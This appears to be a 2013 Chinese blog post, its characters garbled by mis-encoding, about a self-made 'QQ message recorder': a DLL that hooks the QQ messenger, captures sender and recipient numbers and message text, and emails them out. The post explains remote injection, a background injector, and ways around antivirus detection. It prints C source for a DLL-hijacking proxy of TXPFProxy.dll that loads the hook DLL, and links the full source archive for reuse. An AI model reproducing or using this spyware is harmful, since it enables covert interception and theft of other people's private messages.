寫(xiě)一個(gè)簡(jiǎn)單DLL 獲取QQ消息的DLL,貌似網(wǎng)上有賣(mài)這個(gè),但貌似對(duì)于QQ2013是不行的,因?yàn)樗脛?dòng)態(tài)劫持,貌似最新版用QQ劫持都有點(diǎn)不行。我測(cè)試用遠(yuǎn)程注入,你可以自己寫(xiě)代碼實(shí)現(xiàn)遠(yuǎn)程注入軟件也可以網(wǎng)上下載遠(yuǎn)程注入軟件,我為了方便大家把自己寫(xiě)非常遠(yuǎn)程軟件上傳到這里,方便你測(cè)試。我先截一下效果圖 
這個(gè)我只是簡(jiǎn)單獲取 發(fā)送方QQ 號(hào) 和目標(biāo)的QQ號(hào) 和 文本內(nèi)容,你如果有其他需求,自己可以添加對(duì)應(yīng)的HOOK的QQ API獲取對(duì)應(yīng)信息,也可以上網(wǎng)百度或者google一下。記住發(fā)送郵件要用線程不然會(huì)阻塞QQ。代碼你可以任意修改,任意發(fā)布
我這里只是寫(xiě)了簡(jiǎn)單的DLL,你可以一個(gè)exe 主程序,這個(gè)主程序可以后臺(tái)運(yùn)行,當(dāng)發(fā)現(xiàn)有QQ進(jìn)程 ,并且沒(méi)有注入你的DLL,你就可以注入DLL,這是一個(gè)比較可行的辦法。如果殺毒軟件攔截,你直接添加信任,下次就不會(huì)出現(xiàn)提示框了,QQ對(duì)于遠(yuǎn)程注入會(huì)認(rèn)為合法。但對(duì)于DLL劫持加載DLL 會(huì)阻止。我劫持lpk.dll 和 msimg32 都會(huì)攔截,而且金山殺毒只要你復(fù)制 這樣名字的dll 都會(huì)報(bào)毒,但你掃描他又認(rèn)為沒(méi)有毒,可見(jiàn)殺毒這樣的DLL原理還是比較簡(jiǎn)單,我估計(jì)金山是對(duì)shell 進(jìn)行掛鉤 。 但貌似如果我用寫(xiě)編譯器可以生成這樣的文件,殺毒軟件是不會(huì)報(bào)毒,我設(shè)想我就用c 語(yǔ)言 fopen fwrite fread 寫(xiě)一個(gè) exe 應(yīng)該殺毒軟件就不會(huì)報(bào)毒了,或許這是金山的BUG。(我沒(méi)有測(cè)試我的想法,你感興趣可以試試)。我的DLL構(gòu)成:MAIL: ZBase64.h ZBase64.cpp CMail.cpp CMail.h 處理發(fā)送簡(jiǎn)單SMTP郵件HOOK:ULHook.cpp ULHook.h 處理HOOKMAIN: main.cpp 業(yè)務(wù)層吧。我發(fā)送郵件時(shí)用多線程,當(dāng)你輸入字?jǐn)?shù)超過(guò)10個(gè)我就開(kāi)始發(fā)送了(這里只是為了測(cè)試用的),你可以定義100或者更長(zhǎng)看你的需求。 我測(cè)試一下劫持 TXPFProxy.dll(進(jìn)入安全模式把源碼TXPFProxy.dll 改為T(mén)XPFProxy1.dll ,因?yàn)镼Q 用驅(qū)動(dòng)保護(hù)這個(gè)文件不能夠被修改刪除)
但貌似QQ會(huì)崩潰后面就不加載這個(gè)dll. 不知道是不是的假冒的dll 有問(wèn)題還是怎么了。
我覺(jué)得這樣寫(xiě)應(yīng)該沒(méi)有問(wèn)題。。。
1 #include <Windows.h>
2 #include <process.h>
3 4 #pragma comment(linker,"/EXPORT:DllCanUnloadNow=TXPFProxy1.DllCanUnloadNow")
5 #pragma comment(linker,"/EXPORT:DllGetClassObject=TXPFProxy1.DllGetClassObject")
6 #pragma comment(linker,"/EXPORT:DllRegisterServer=TXPFProxy1.DllRegisterServer")
7 #pragma comment(linker,"/EXPORT:DllUnregisterServer=TXPFProxy1.DllUnregisterServer")
8 #pragma comment(linker,"/EXPORT:GetProxyDllInfo=TXPFProxy1.GetProxyDllInfo")
9 10 void Init(
void*)
11 {
12 Sleep(10000);
13 LoadLibraryA("CULHook.dll");
14 }
15 16 int __stdcall DllMain(_In_ HANDLE _HDllHandle, _In_ DWORD _Reason, _In_opt_ LPVOID _Reserved)
17 {
18 if(_Reason == DLL_PROCESS_ATTACH)
19 {
20 _beginthread(Init,0,NULL);
21 }
22 23 }
現(xiàn)在對(duì)QQ的DLL劫持 不是那么好做了啊,算了,反正我對(duì)這個(gè)不感興趣,只是好玩,基本已經(jīng)達(dá)到我的要求,我又不要賣(mài)這個(gè)軟件。
附件代碼:
/Files/xvsdf100/QQ消息記錄器.zip
posted on 2013-05-10 13:12
小魚(yú)兒 閱讀(4685)
評(píng)論(1) 編輯 收藏 引用